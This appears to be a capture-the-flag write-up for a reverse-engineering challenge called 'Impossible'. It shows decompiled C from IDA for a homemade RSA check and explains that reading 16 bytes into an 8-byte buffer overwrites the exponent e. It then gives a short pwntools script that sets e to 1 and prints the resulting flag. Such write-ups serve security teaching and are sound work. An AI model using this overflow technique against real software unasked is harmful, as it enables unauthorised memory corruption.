Your colleague trolls you by giving you an impossible challenge, betting $100 that you won't succeed.
Show him who's the boss!
Host :
Port : 8001
Format : Hero{flag}
Author : SoEasY
After opening the challenge in IDA, we can take a look at the main:
int __cdecl main(int argc, const char **argv, const char **envp){
unsigned int v3; // eax
unsigned int v4; // r12d
unsigned int v5; // ebx
unsigned int v6; // eax
char v8; // [rsp+1Bh] [rbp-25h]
FILE *stream; // [rsp+28h] [rbp-18h]
"If you can find a value such that encrypt(value) == 12345, I'll give you my flag.\n"
"But don't try to much, it's impossible: I'm using a home made RSA algorithm with random values!");
v3 = time(0LL);
p = rand() % 36341 + 10000;
q = rand() % 36341 + 10000;
e = rand() % 36341 + 10000;
n = p * q;
phi = (p - 1) * (q - 1);
printf("Enter a value to encrypt: ");
fgets(m, 16, stdin);
v4 = n;
v5 = e;
v6 = atoi(m);
if ( (unsigned int)modular_exponentiation(v6, v5, v4) == 12345){
stream = fopen("flag.txt", "r");
while ( 1 ){
v8 = fgetc(stream);
if ( v8 == -1 )
puts("I told you, no one can solve this. You'll never get my flag!");
return 0;
So this is basically an RSA encryption algorithm with random values as p, q and e which is annoying.
We can see that an integer m
is read on stdin on 16 bytes as a string and will later be converted to an int with the atoi()
function. Let's see m
in memory:
.bss:0x4040 m db 8 dup(?)
.bss:0x4048 e dd ?
We can here see that the m
value is a char[8]
: if we enter more than 8 bytes in m
, we will overflow on the e
value which is very interesting because e
is the exponent in the RSA encryption algorithm !
if e=1
, we will have cipher == clear !
So the plan is to have m=12345
with e=1
so that c=12345
from pwn import *
r = process("./Impossible")
buf = b'12345'
# This way, atoi(12345\x00\x00\x00) = 12345
buf += b'\x00' * 3
# e = 1
buf += p64(1)
log.success(f"Payload length: {len(buf)}")
flag = r.recvall().split(b' ')[-1].decode()
info(f"FLAG: {flag}")
$ python3
[+] Starting local process './Impossible': pid 168319
[+] Payload length: 16
[+] Receiving all data: Done (250B)
[*] Process './Impossible' stopped with exit code 0 (pid 168319)
[*] FLAG: Hero{Th3r3_1s_n0_w4y_y0u_d1d_1t_CH34T3R!!!!!}